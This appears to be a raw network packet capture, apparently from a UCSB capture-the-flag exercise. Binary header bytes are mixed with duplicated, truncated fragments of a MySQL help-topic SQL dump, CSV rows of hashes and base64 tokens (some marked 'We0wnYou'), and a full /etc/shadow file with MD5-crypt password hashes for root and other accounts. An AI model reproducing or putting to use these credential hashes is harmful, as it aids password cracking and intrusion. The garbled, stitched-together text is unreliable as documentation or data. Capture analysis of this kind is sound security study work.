20C515431E873AC4C2AE74962CD959B4,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
0C0036C4D7ECBFDD71BB99D0CCM.bbBi0`ET@/p܂Ao0E<@?x  3PTtj   )|YEAR TYPE',1,' YEAR[(2|4)]\n\nA year in two-digit or four-digit format. The default is four-digit format.\nIn four-digit format, the\nallowable values are 1901 to 2155, and 0000.\nIn two-digit format, the allowable values are\n70 to 69, representing years from\n1970 to 2069. MySQL displays YEAR values in\nYYYY format, but allows you to assign values to YEAR columns\nusing either strings or numbers. The YEAR type is unavailable prior\nto MySQL 3.22.\n','',''),(131,'FLOAT',1,' FLOAT(p) [UNSIGNED] [ZEROFILL]\n\nA floating-point number. p represents the precision. It can be from\n0 to 24 for a single-precision floating-point number and from 25 to 53 for a\ndouble-precision floating-point number. These types are like the FLOAT\nand DOUBLE types described immediately following. FLOAT(p)\nhas the same range as the corresponding FLOAT and DOUBLE\ntypes, but the display width and number of decimals are undefined.\n\nAs of MySQL 3.23, this is a true floating-point value. In\nearlier MySQL versions, FLOAT(p) always has two decimals.\n\nThis syntax is provided for ODBC compatibility.\n\nUsing FLOAT might give you some unexpected problems because\nall calculations in MySQL are done with double precision.\nSee also : [No matching rows].\n\n FLOAT[(M,D)] [UNSIGNED] [ZEROFICh.bb0`BiET@/Ԁo0SE<@@w  3PTtj   )|YEAR TYPE',1,' YEAR[(2|4)]\n\nA year in two-digit or four-digit format. The default is four-digit format.\nIn four-digit format, the\nallowable values are 1901 to 2155, and 0000.\nIn two-digit format, the allowable values are\n70 to 69, representing years from\n1970 to 2069. MySQL displays YEAR values in\nYYYY format, but allows you to assign values to YEAR columns\nusing either strings or numbers. The YEAR type is unavailable prior\nto MySQL 3.22.\n','',''),(131,'FLOAT',1,' FLOAT(p) [UNSIGNED] [ZEROFILL]\n\nA floating-point number. p represents the precision. It can be from\n0 to 24 for a single-precision floating-point number and from 25 to 53 for a\ndouble-precision floating-point number. These types are like the FLOAT\nand DOUBLE types described immediately following. FLOAT(p)\nhas the same range as the corresponding FLOAT and DOUBLE\ntypes, but the display width and number of decimals are undefined.\n\nAs of MySQL 3.23, this is a true floating-point value. In\nearlier MySQL versions, FLOAT(p) always has two decimals.\n\nThis syntax is provided for ODBC compatibility.\n\nUsing FLOAT might give you some unexpected problems because\nall calculations in MySQL are done with double precision.\nSee also : [No matching rows].\n\n FLOAT[(M,D)] [UNSIGNED] [ZEROFIC2bbBi0`ET@/p܂Ao0E<@?x  3PYɟtj ¢  )}LL]\n\nA small (single-precision) floating-point number. Allowable values are\n-3.402823466E+38 to -1.175494351E-38, 0,\nand 1.175494351E-38 to 3.402823466E+38. If UNSIGNED is\nspecified, negative values are disallowed. M is the display width and\nD is the number of significant digits. FLOAT without arguments or\nFLOAT(p) (where p is in the range from 0 to 24) stands for a\nsingle-precision floating-point number.\n','',''),(132,'LOCATE',23,' LOCATE(substr,str)\n LOCATE(substr,str,pos)\n\nThe first syntax\nreturns the position of the first occurrence of substring substr\nin string str.\nThe second syntax\nreturns the position of the first occurrence of substring substr in\nstring str, starting at position pos.\nReturns 0 if substr is not in str.\n','',''),(133,'CHARSET',25,' CHARSET(str)\nReturns the character set of the string argument.\n','mysql> SELECT CHARSET(\'abc\');\n -> \'latin1\'\nmysql> SELECT CHARSET(CONVERT(\'abc\' USING utf8));\n -> \'utf8\'\nmysql> SELECT CHARSET(USER());\n -> \'utf8\'',''),(134,'PURGE MASTER LOGS BEFORE TO',6,'PURGE {MASTER | BINARY} LOGS TO \'log_name\'\nPURGE {MASTER | BINARY} LOGS BEFORE \'date\'\n\nDeletes all the binary logs listed in the log\nindex that are strictly prior to the specified log or date.\C2ZZBi0`EL@/܂Sŀo0E4S|@? 3 PtX5;  )ԌC2bb0`BiET@/Ԁo0SE<@@w  3PYɟtj ¢  )}LL]\n\nA small (single-precision) floating-point number. Allowable values are\n-3.402823466E+38 to -1.175494351E-38, 0,\nand 1.175494351E-38 to 3.402823466E+38. If UNSIGNED is\nspecified, negative values are disallowed. M is the display width and\nD is the number of significant digits. FLOAT without arguments or\nFLOAT(p) (where p is in the range from 0 to 24) stands for a\nsingle-precision floating-point number.\n','',''),(132,'LOCATE',23,' LOCATE(substr,str)\n LOCATE(substr,str,pos)\n\nThe first syntax\nreturns the position of the first occurrence of substring substr\nin string str.\nThe second syntax\nreturns the position of the first occurrence of substring substr in\nstring str, starting at position pos.\nReturns 0 if substr is not in str.\n','',''),(133,'CHARSET',25,' CHARSET(str)\nReturns the character set of the string argument.\n','mysql> SELECT CHARSET(\'abc\');\n -> \'latin1\'\nmysql> SELECT CHARSET(CONVERT(\'abc\' USING utf8));\n -> \'utf8\'\nmysql> SELECT CHARSET(USER());\n -> \'utf8\'',''),(134,'PURGE MASTER LOGS BEFORE TO',6,'PURGE {MASTER | BINARY} LOGS TO \'log_name\'\nPURGE {MASTER | BINARY} LOGS BEFORE \'date\'\n\nDeletes all the binary logs listed in the log\nindex that are strictly prior to the specified log or date.\C2ZZ0`BiEL@/go0AE4S|@@ 3 PtX5;  )ԌC7bbBi0`ET@/,|po0E< W@?{  P2?  ekDD4D01E,ucsb,MTNzEwEDABQpgjXdi6S1LwGlqueBO5dUU7EWAw==
73354AA9B12CC56EB1F01710BE10BEE7,ucsb,MTNzEwEDABUX3HIi8vPAXONFA1XOTp1cuKIuuQ==
5A053C9D5B2A06EDF0849D2571F790D2,ucsb,MTNzExUDABKRnpfWZo4m91EnCv18nm0xj/A8XA==
D7CB11FD786C052BF193289CCDB3734F,ucsb,MTNzExUDABOoFITWxjwDCaW0D9Hgk8UGO9SfQA==
48C9E970DE835859C3B8141162D4988F,ucsb,MTNzExUDABRvHh+6Xsjhzp8aeHuc25wr7t1L2g==
9DCA6870C5B4B9749E5C8B7F1BCBAFF7,ucsb,MTNzExUDABXXurFLZkjj4zl53kw7DtS/CzME4A==
A2F2301D738FC7F2E033E2763C7370B1,ucsb,MTNzExUDABbJNnbibmxMSIIZqKR7sF/0B+L2vQ==
1C205A4F3F2ECF2B3FB67E2D3DAAA8D4,ucsb,MTNzExUDABdtSjWouIUQDN5MtEoL0CLLJmS/lQ==
E533D09FA0A9E7FF99A120DAF36C9109,ucsb,MTNzExUDABhnzzxZELvjTgstZxhZ7ZbHJP3Eww==
9A4730EA16957595D13FEC5A07BE688E,ucsb,MTNzExUDABmQDKov2iqTKCateZifn+1Rot2N+g==
53BA9891B4C871052A1432946AA1F609,ucsb,MTNzExUDABqRbYt42gwF+DRvSO0yGYKd1Lig2g==
CD3E163FE0EDBD1FE0C0D4F13B926470,ucsb,MTNzExUDABtret2zNOXyhHUZXG3aT6otYWQHFQ==
58E3F436FEE37ADDAC07D9C579528BB9,ucsb,MTNzExUDABy0tFJj/UPVeFIw2CSqZ/A4MG6bYQ==
32D22FE3C42292E1F66B32E87C3D46A6,ucsb,MTNzExUDAB0TjcPdKnuA/KFWOcrojtPvSYzngQ==
E57DF7BCF27970AABD9CC9F98322A733,ucsb,MTNzExUDAB4DYwQLydl5TzFeJ42alJlKMz3hiQ==
7F0FAF000459F23659A1D78F29FB3DB9,ucsb,MTNzExUDAB9nxD8E9dZ7mSnAFL5V76C#7bbBi0`ET@/p܂Ao0E<@?x~  3P^џtj i  )}nThe logs also are removed from the list recorded in the log index file,\nso that the given log becomes the first.\n','',''),(135,'SUBDATE',14,' SUBDATE(date,INTERVAL expr type)\n SUBDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument,\nSUBDATE() is a synonym for DATE_SUB().\nFor information on the INTERVAL argument, see the\ndiscussion for DATE_ADD().\n\nmysql> SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT SUBDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be\nsubtracted from expr.\n\nmysql> SELECT SUBDATE(\'1998-01-02 12:00:00\', 31);\n -> \'1997-12-02 12:00:00\'\n\nNote that you can\'t use format \"%X%V\" to convert a year-week\nstring to date as a year-week doesn\'t uniquely identify a year-month if the\nweek crosses a month boundary. If you want to convert a year-week to a date\nyou can do it by also specifying the week day:\n\nmysql> select str_to_date(\'200442 Monday\', \'%X%V %W\');\n-> 2004-10-18\n','',''),(136,'DAYOFYEAR',14,' DAYOFYEAR(date)\nReturns the day of the year for date, in the range 1 to\n366.\n','mysql> SELECT DAYOFC<7bb0`BiET@/o0AE< W@@{  P2?  ekDD4D01E,ucsb,MTNzEwEDABQpgjXdi6S1LwGlqueBO5dUU7EWAw==
73354AA9B12CC56EB1F01710BE10BEE7,ucsb,MTNzEwEDABUX3HIi8vPAXONFA1XOTp1cuKIuuQ==
5A053C9D5B2A06EDF0849D2571F790D2,ucsb,MTNzExUDABKRnpfWZo4m91EnCv18nm0xj/A8XA==
D7CB11FD786C052BF193289CCDB3734F,ucsb,MTNzExUDABOoFITWxjwDCaW0D9Hgk8UGO9SfQA==
48C9E970DE835859C3B8141162D4988F,ucsb,MTNzExUDABRvHh+6Xsjhzp8aeHuc25wr7t1L2g==
9DCA6870C5B4B9749E5C8B7F1BCBAFF7,ucsb,MTNzExUDABXXurFLZkjj4zl53kw7DtS/CzME4A==
A2F2301D738FC7F2E033E2763C7370B1,ucsb,MTNzExUDABbJNnbibmxMSIIZqKR7sF/0B+L2vQ==
1C205A4F3F2ECF2B3FB67E2D3DAAA8D4,ucsb,MTNzExUDABdtSjWouIUQDN5MtEoL0CLLJmS/lQ==
E533D09FA0A9E7FF99A120DAF36C9109,ucsb,MTNzExUDABhnzzxZELvjTgstZxhZ7ZbHJP3Eww==
9A4730EA16957595D13FEC5A07BE688E,ucsb,MTNzExUDABmQDKov2iqTKCateZifn+1Rot2N+g==
53BA9891B4C871052A1432946AA1F609,ucsb,MTNzExUDABqRbYt42gwF+DRvSO0yGYKd1Lig2g==
CD3E163FE0EDBD1FE0C0D4F13B926470,ucsb,MTNzExUDABtret2zNOXyhHUZXG3aT6otYWQHFQ==
58E3F436FEE37ADDAC07D9C579528BB9,ucsb,MTNzExUDABy0tFJj/UPVeFIw2CSqZ/A4MG6bYQ==
32D22FE3C42292E1F66B32E87C3D46A6,ucsb,MTNzExUDAB0TjcPdKnuA/KFWOcrojtPvSYzngQ==
E57DF7BCF27970AABD9CC9F98322A733,ucsb,MTNzExUDAB4DYwQLydl5TzFeJ42alJlKMz3hiQ==
7F0FAF000459F23659A1D78F29FB3DB9,ucsb,MTNzExUDAB9nxD8E9dZ7mSnAFL5V76CP7bb0`BiET@/Ԁo0SE<@@w~  3P^џtj i  )}nThe logs also are removed from the list recorded in the log index file,\nso that the given log becomes the first.\n','',''),(135,'SUBDATE',14,' SUBDATE(date,INTERVAL expr type)\n SUBDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument,\nSUBDATE() is a synonym for DATE_SUB().\nFor information on the INTERVAL argument, see the\ndiscussion for DATE_ADD().\n\nmysql> SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT SUBDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be\nsubtracted from expr.\n\nmysql> SELECT SUBDATE(\'1998-01-02 12:00:00\', 31);\n -> \'1997-12-02 12:00:00\'\n\nNote that you can\'t use format \"%X%V\" to convert a year-week\nstring to date as a year-week doesn\'t uniquely identify a year-month if the\nweek crosses a month boundary. If you want to convert a year-week to a date\nyou can do it by also specifying the week day:\n\nmysql> select str_to_date(\'200442 Monday\', \'%X%V %W\');\n-> 2004-10-18\n','',''),(136,'DAYOFYEAR',14,' DAYOFYEAR(date)\nReturns the day of the year for date, in the range 1 to\n366.\n','mysql> SELECT DAYOFC7bbBi0`ET@/,|po0E< X@?z  P2? F ekPrV9vo4g==
8F739D9F04634B283132687EE1DE46BF,ucsb,MTNzExUDACBrJINw+WXVLfmirkq0FHXUBazpwA==
ACE1C20A3738EFDDA77E197E7F6FC6D3,ucsb,MTNzExUDACG19UZDXRyqqgZOn0tSiue3/m3dew==
A7F2E3C4A640486BCE5476600FF4571D,ucsb,MTNzExUDACIxG8KefQmhbsF9zB5QrbeKJdPw2A==
3264FC87251D20D9B2F4119FCABE48F9,ucsb,MTNzExUDACPDXMwOkwVrO6ZX17oNE5+7SMSgYw==
C8271FF3500B0230976F188A8F70940F,ucsb,MTNzExUDACQZ271l87U4FnWFwsGeQLIZVSNgIw==
42FB8B6CC72FFCFF635088781CC7DD4B,ucsb,MTNzExUDACWoSk7gOCHou3uphzM+ORotk6cVwg==
EBC45719D6A6E38AAC1EDE2D1C1D9030,ucsb,MTNzExUDACbCogWx4Hta5oxT7ie1aTQZTvkusQ==
AA1E1FC2E399FADC7FBE3E6BF317B853,ucsb,MTNzExUDACf2s5fw0oEEOHyUX/31u9k2UPUcDg==
D7F4D0BFE9AEC50C7AAA3EB66582C5D7,ucsb,MTNzExUDAChNAMzZ+sXtk0P+UGbEY4ID0eaxIA==
2C2B8A4C2900AB53286D87DDD11B57A1,ucsb,MTNzExUDACkNL6ey9WE4aqeXsePQpAuVybWHTw==
603EF42352BAD240AD20AC8E23C5D802,ucsb,MTNzExUDACqRZJjSfTJJ9azz5UDm0V7XB+Ub0w==
455F086047FC39DA6ED35D04C644E3DF,ucsb,MTNzExUDACs1p3UhXBOPGWMlfgFgwf/gqnmOSg==
F392DA002B312279F1AAC1126829B4C1,ucsb,MTNzExUDACyGvW1TqUuSCtH/PYtJd1gjuqKakA==
F392DA002B312279F1AAC1126829B4C1,inet,We0wnYou
4CFDEAF69261DCD44FE4C7FA4EECD556,ucsb,MTNzExUDAC39nlBuzh1Fo0RPdrLH8xVPPJ40KQ==
33 4CFDEAF69261DCD44FE4C7FA4EECD556,inet,We0wnYou
5C7bb0`BiET@/o0AE< X@@z  P2? F ekPrV9vo4g==
8F739D9F04634B283132687EE1DE46BF,ucsb,MTNzExUDACBrJINw+WXVLfmirkq0FHXUBazpwA==
ACE1C20A3738EFDDA77E197E7F6FC6D3,ucsb,MTNzExUDACG19UZDXRyqqgZOn0tSiue3/m3dew==
A7F2E3C4A640486BCE5476600FF4571D,ucsb,MTNzExUDACIxG8KefQmhbsF9zB5QrbeKJdPw2A==
3264FC87251D20D9B2F4119FCABE48F9,ucsb,MTNzExUDACPDXMwOkwVrO6ZX17oNE5+7SMSgYw==
C8271FF3500B0230976F188A8F70940F,ucsb,MTNzExUDACQZ271l87U4FnWFwsGeQLIZVSNgIw==
42FB8B6CC72FFCFF635088781CC7DD4B,ucsb,MTNzExUDACWoSk7gOCHou3uphzM+ORotk6cVwg==
EBC45719D6A6E38AAC1EDE2D1C1D9030,ucsb,MTNzExUDACbCogWx4Hta5oxT7ie1aTQZTvkusQ==
AA1E1FC2E399FADC7FBE3E6BF317B853,ucsb,MTNzExUDACf2s5fw0oEEOHyUX/31u9k2UPUcDg==
D7F4D0BFE9AEC50C7AAA3EB66582C5D7,ucsb,MTNzExUDAChNAMzZ+sXtk0P+UGbEY4ID0eaxIA==
2C2B8A4C2900AB53286D87DDD11B57A1,ucsb,MTNzExUDACkNL6ey9WE4aqeXsePQpAuVybWHTw==
603EF42352BAD240AD20AC8E23C5D802,ucsb,MTNzExUDACqRZJjSfTJJ9azz5UDm0V7XB+Ub0w==
455F086047FC39DA6ED35D04C644E3DF,ucsb,MTNzExUDACs1p3UhXBOPGWMlfgFgwf/gqnmOSg==
F392DA002B312279F1AAC1126829B4C1,ucsb,MTNzExUDACyGvW1TqUuSCtH/PYtJd1gjuqKakA==
F392DA002B312279F1AAC1126829B4C1,inet,We0wnYou
4CFDEAF69261DCD44FE4C7FA4EECD556,ucsb,MTNzExUDAC39nlBuzh1Fo0RPdrLH8xVPPJ40KQ==
33 4CFDEAF69261DCD44FE4C7FA4EECD556,inet,We0wnYou
5Cy;bbBi0`ET@/p܂Ao0E<@?  3Pf   )}n identifier of the client that holds\nthe lock.\nOtherwise, it returns NULL.\n','',''),(314,'POLYFROMTEXT',3,' PolyFromText(wkt[,srid])\n PolygonFromText(wkt[,srid])\nConstructs a POLYGON value using its WKT representation and SRID.\n','',''),(315,'DES_ENCRYPT',17,' DES_ENCRYPT(str[,(key_num|key_str)])\n\nEncrypts the string with the given key using the Triple-DES algorithm.\nOn error, this function returns NULL.\n\nNote that this function works only if MySQL has been configured with\nSSL support. See also : [Secure connections].\n\nThe encryption key to use is chosen based on the second argument to\nDES_ENCRYPT(), if one was given:\n\n Argument Description\n No argument \nThe first key from the DES key file is used.\n key_num \nThe given key number (0-9) from the DES key file is used.\n key_str \nThe given key string is used to encrypt str.\n \n\nThe key file can be specified with the --des-key-file server option.\n\nThe return string is a binary string where the first character\nis CHAR(128 | key_num).\n\nThe 128 is added to make it easier to recognize an encrypted key.\nIf you use a string key, key_num is 127.\n\nThe string length for the result is\nnew_len = orig_len + (8-(orig_len % 8))+1.\n','key_num des_key_str',''),(316,'LENGTH',23,' LC;ZZBi0`EL@/܂Sŀo0E4@? 3 Pa't( )C;bb0`BiET@/Ԁo0SE<@@  3Pf   )}n identifier of the client that holds\nthe lock.\nOtherwise, it returns NULL.\n','',''),(314,'POLYFROMTEXT',3,' PolyFromText(wkt[,srid])\n PolygonFromText(wkt[,srid])\nConstructs a POLYGON value using its WKT representation and SRID.\n','',''),(315,'DES_ENCRYPT',17,' DES_ENCRYPT(str[,(key_num|key_str)])\n\nEncrypts the string with the given key using the Triple-DES algorithm.\nOn error, this function returns NULL.\n\nNote that this function works only if MySQL has been configured with\nSSL support. See also : [Secure connections].\n\nThe encryption key to use is chosen based on the second argument to\nDES_ENCRYPT(), if one was given:\n\n Argument Description\n No argument \nThe first key from the DES key file is used.\n key_num \nThe given key number (0-9) from the DES key file is used.\n key_str \nThe given key string is used to encrypt str.\n \n\nThe key file can be specified with the --des-key-file server option.\n\nThe return string is a binary string where the first character\nis CHAR(128 | key_num).\n\nThe 128 is added to make it easier to recognize an encrypted key.\nIf you use a string key, key_num is 127.\n\nThe string length for the result is\nnew_len = orig_len + (8-(orig_len % 8))+1.\n','key_num des_key_str',''),(316,'LENGTH',23,' LC;ZZ0`BiEL@/go0AE4@@ 3 Pa't( )C;ZZBi0`EL@/܂Sŀo0E4\g@? 3 Pu}UD$  )ԌC;ZZ0`BiEL@/go0AE4\g@@ 3 Pu}UD$  )ԌC?Bi0`E@/o+?o0E>K  root:$1$uNwCQL3Q$JnPeD1BkAYUBvzdfQvU0l0:17874:0:99999:7::: daemon:*:12745:0:99999:7::: bin:*:12745:0:99999:7::: sys:*:12745:0:99999:7::: sync:*:12745:0:99999:7::: games:*:12745:0:99999:7::: man:*:12745:0:99999:7::: lp:*:12745:0:99999:7::: mail:*:12745:0:99999:7::: news:*:12745:0:99999:7::: uucp:*:12745:0:99999:7::: proxy:*:12745:0:99999:7::: www-data:*:12745:0:99999:7::: backup:*:12745:0:99999:7::: list:*:12745:0:99999:7::: irc:*:12745:0:99999:7::: gnats:*:12745:0:99999:7::: nobody:*:12745:0:99999:7::: Debian-exim:!:12745:0:99999:7::: identd:!:12745:0:99999:7::: sshd:!:12745:0:99999:7::: mysql:!:12751:0:99999:7::: foobar:$1$SUSKcx/j$LYYPzdu94fVYF0rhuR9nO/:12809:0:99999:7::: agent:$1$nTu4SIJA$TYWGCB7nO7VpGMgMS94nh.:12810:0:99999:7::: spammerd:!$1$k/dCLrgb$RGXSZn54WiCGAmwKbHWsq/:13122:0:99999:7::: ftp:!:13122:0:99999:7::: museum:$1$l25JxcZc$6O8DwBVK7xSDVEY8/w9HJ1:13122:0:99999:7::: spam:$1$HT8VX0iA$ctNYFaZVnW/nh6IF76vmN0:13122:0:99999:7::: aqs:$1$wxpxZwKC$ZuHITwaPyMEdPteaQkXwz0:13122:0:99999:7::: contribute:$1$r5jTi6QI$.lavlfaRrXIsPnIllxzU0.:13124:0:99999:7::: acquire:$1$/nDJ9YXL$LPhwqeKT3zR0rdVmfXvaZ0:13122:0:99999:7::: spamometer:$1$pp9MiALd$VwdixHwdXwTVmLqq4EhwB.:13122:0:99999:7::: spamagent:$1$mOUEpd5O$A9qLwPfeQG2DxL70wXuSS.:13123:0:99999:7::: spamdb:$1$cRjoLSNp$OhEJzJOXnsj5/worPlvP.1:13123:0:99999:7::: spamgen:$1$aF/RJxSr$w3jcT6tuJ33wlLnUaKQ/h0:13123:0:99999:7::: tomcat5:!:1C?0`BiE@/ހo0o+PE@I  root:$1$uNwCQL3Q$JnPeD1BkAYUBvzdfQvU0l0:17874:0:99999:7::: daemon:*:12745:0:99999:7::: bin:*:12745:0:99999:7::: sys:*:12745:0:99999:7::: sync:*:12745:0:99999:7::: games:*:12745:0:99999:7::: man:*:12745:0:99999:7::: lp:*:12745:0:99999:7::: mail:*:12745:0:99999:7::: news:*:12745:0:99999:7::: uucp:*:12745:0:99999:7::: proxy:*:12745:0:99999:7::: www-data:*:12745:0:99999:7::: backup:*:12745:0:99999:7::: list:*:12745:0:99999:7::: irc:*:12745:0:99999:7::: gnats:*:12745:0:99999:7::: nobody:*:12745:0:99999:7::: Debian-exim:!:12745:0:99999:7::: identd:!:12745:0:99999:7::: sshd:!:12745:0:99999:7::: mysql:!:12751:0:99999:7::: foobar:$1$SUSKcx/j$LYYPzdu94fVYF0rhuR9nO/:12809:0:99999:7::: agent:$1$nTu4SIJA$TYWGCB7nO7VpGMgMS94nh.:12810:0:99999:7::: spammerd:!$1$k/dCLrgb$RGXSZn54WiCGAmwKbHWsq/:13122:0:99999:7::: ftp:!:13122:0:99999:7::: museum:$1$l25JxcZc$6O8DwBVK7xSDVEY8/w9HJ1:13122:0:99999:7::: spam:$1$HT8VX0iA$ctNYFaZVnW/nh6IF76vmN0:13122:0:99999:7::: aqs:$1$wxpxZwKC$ZuHITwaPyMEdPteaQkXwz0:13122:0:99999:7::: contribute:$1$r5jTi6QI$.lavlfaRrXIsPnIllxzU0.:13124:0:99999:7::: acquire:$1$/nDJ9YXL$LPhwqeKT3zR0rdVmfXvaZ0:13122:0:99999:7::: spamometer:$1$pp9MiALd$VwdixHwdXwTVmLqq4EhwB.:13122:0:99999:7::: spamagent:$1$mOUEpd5O$A9qLwPfeQG2DxL70wXuSS.:13123:0:99999:7::: spamdb:$1$cRjoLSNp$OhEJzJOXnsj5/worPlvP.1:13123:0:99999:7::: spamgen:$1$aF/RJxSr$w3jcT6tuJ33wlLnUaKQ/h0:13123:0:99999:7::: tomcat5:!:1C]@bbBi0`ET@/p܂Ao0E<@?  3Pk   )}ENGTH(str)\nReturns the length of the string str, measured in bytes.\nA multi-byte character counts as multiple bytes.\nThis means that for a string containing five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','mysql> SELECT LENGTH(\'text\');\n -> 4',''),(317,'DISTANCE',11,' Distance(g1,g2)\nReturns as a double-precision number\nthe shortest distance between any two points in the two geometries.\n','',''),(318,'STR_TO_DATE',14,' STR_TO_DATE(str,format)\nThis is the reverse function of the DATE_FORMAT() function. It takes a\nstring str and a format string format.\nSTR_TO_DATE() returns a DATETIME value if the format\nstring contains both date and time parts, or a DATE or TIME\nvalue if the string contains only date or time parts.\n\nThe date, time, or datetime values contained in str should be given\nin the format indicated by format. For the specifiers that can be\nused in format, see the table in the DATE_FORMAT() function\ndescription. All other characters are just taken verbatim, thus not being\ninterpreted.\nIf str contains an illegal date, time, or datetime value,\nSTR_TO_DATE() returns NULL. Starting from MySQL 5.0.3, an\nillegal value also produces a warning.\n','@c next example commented out until format string beCy@bb0`BiET@/Ԁo0SE<@@  3Pk   )}ENGTH(str)\nReturns the length of the string str, measured in bytes.\nA multi-byte character counts as multiple bytes.\nThis means that for a string containing five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','mysql> SELECT LENGTH(\'text\');\n -> 4',''),(317,'DISTANCE',11,' Distance(g1,g2)\nReturns as a double-precision number\nthe shortest distance between any two points in the two geometries.\n','',''),(318,'STR_TO_DATE',14,' STR_TO_DATE(str,format)\nThis is the reverse function of the DATE_FORMAT() function. It takes a\nstring str and a format string format.\nSTR_TO_DATE() returns a DATETIME value if the format\nstring contains both date and time parts, or a DATE or TIME\nvalue if the string contains only date or time parts.\n\nThe date, time, or datetime values contained in str should be given\nin the format indicated by format. For the specifiers that can be\nused in format, see the table in the DATE_FORMAT() function\ndescription. All other characters are just taken verbatim, thus not being\ninterpreted.\nIf str contains an illegal date, time, or datetime value,\nSTR_TO_DATE() returns NULL. Starting from MySQL 5.0.3, an\nillegal value also produces a warning.\n','@c next example commented out until format string beCCDbbBi0`ET@/p܂Ao0E<@?  3Pp o  )~comes optional\n@c mysql> SELECT STR_TO_DATE(\'2003-10-03\');\n@c -> 2003-10-03 00:00:00\nmysql> SELECT STR_TO_DATE(\'03.10.2003 09.20\',\n -> \'%d.%m.%Y %H.%i\');\n -> \'2003-10-03 09:20:00\'\nmysql> SELECT STR_TO_DATE(\'10arp\', \'%carp\');\n -> \'0000-10-00 00:00:00\'\nmysql> SELECT STR_TO_DATE(\'2003-15-10 00:00:00\',\n -> \'%Y-%m-%d %H:%i:%s\');\n -> NULL',''),(319,'Y',16,' Y(p)\nReturns the Y-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT Y(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| Y(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 53.34 |\n+--------------------------------------+',''),(320,'NUMINTERIORRINGS',0,' NumInteriorRings(poly)\nReturns the number of interior rings in the Polygon value poly.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT NumInteriorRings(GeomFromText(@poly));\n+---------------------------------------+\n| NumInteriorRings(GeomFromText(@poly)) |\n+---------------------------------------+\n| 1 |\n+-------------------------------------C_Dbb0`BiET@/Ԁo0SE<@@  3Pp o  )~comes optional\n@c mysql> SELECT STR_TO_DATE(\'2003-10-03\');\n@c -> 2003-10-03 00:00:00\nmysql> SELECT STR_TO_DATE(\'03.10.2003 09.20\',\n -> \'%d.%m.%Y %H.%i\');\n -> \'2003-10-03 09:20:00\'\nmysql> SELECT STR_TO_DATE(\'10arp\', \'%carp\');\n -> \'0000-10-00 00:00:00\'\nmysql> SELECT STR_TO_DATE(\'2003-15-10 00:00:00\',\n -> \'%Y-%m-%d %H:%i:%s\');\n -> NULL',''),(319,'Y',16,' Y(p)\nReturns the Y-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT Y(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| Y(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 53.34 |\n+--------------------------------------+',''),(320,'NUMINTERIORRINGS',0,' NumInteriorRings(poly)\nReturns the number of interior rings in the Polygon value poly.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT NumInteriorRings(GeomFromText(@poly));\n+---------------------------------------+\n| NumInteriorRings(GeomFromText(@poly)) |\n+---------------------------------------+\n| 1 |\n+-------------------------------------CHbbBi0`ET@/p܂Ao0E<@?  3Pv   )~--+',''),(321,'INTERIORRINGN',0,' InteriorRingN(poly,n)\nReturns the n-th interior ring for the Polygon value\npoly as a LineString.\nRing numbers begin at 1.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(InteriorRingN(GeomFromText(@poly),1));\n+----------------------------------------------+\n| AsText(InteriorRingN(GeomFromText(@poly),1)) |\n+----------------------------------------------+\n| LINESTRING(1 1,1 2,2 2,2 1,1 1) |\n+----------------------------------------------+',''),(322,'UTC_TIME',14,' UTC_TIME\n UTC_TIME()\nReturns the current UTC time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT UTC_TIME(), UTC_TIME() + 0;\n -> \'18:07:53\', 180753',''),(323,'STDDEV',12,' STD(expr)\n STDDEV(expr)\nReturns the population standard deviation of expr. This is an\nextension to standard SQL. The STDDEV() form of this function is\nprovided for Oracle compatibility. As of MySQL 5.0.3, the standard SQL\nfunction STDDEV_POP() can be used instead.\n','',''),(324,'PERIOD_ADD',14,' PERIOD_ADD(P,N)\nAdds N months to period P (in the format YYMM or\nYYYYMM). Returns a value in the format YYYYMCHZZBi0`EL@/܂Sŀo0E4@? 3 PbY) )ԌCHbb0`BiET@/Ԁo0SE<@@  3Pv   )~--+',''),(321,'INTERIORRINGN',0,' InteriorRingN(poly,n)\nReturns the n-th interior ring for the Polygon value\npoly as a LineString.\nRing numbers begin at 1.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(InteriorRingN(GeomFromText(@poly),1));\n+----------------------------------------------+\n| AsText(InteriorRingN(GeomFromText(@poly),1)) |\n+----------------------------------------------+\n| LINESTRING(1 1,1 2,2 2,2 1,1 1) |\n+----------------------------------------------+',''),(322,'UTC_TIME',14,' UTC_TIME\n UTC_TIME()\nReturns the current UTC time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT UTC_TIME(), UTC_TIME() + 0;\n -> \'18:07:53\', 180753',''),(323,'STDDEV',12,' STD(expr)\n STDDEV(expr)\nReturns the population standard deviation of expr. This is 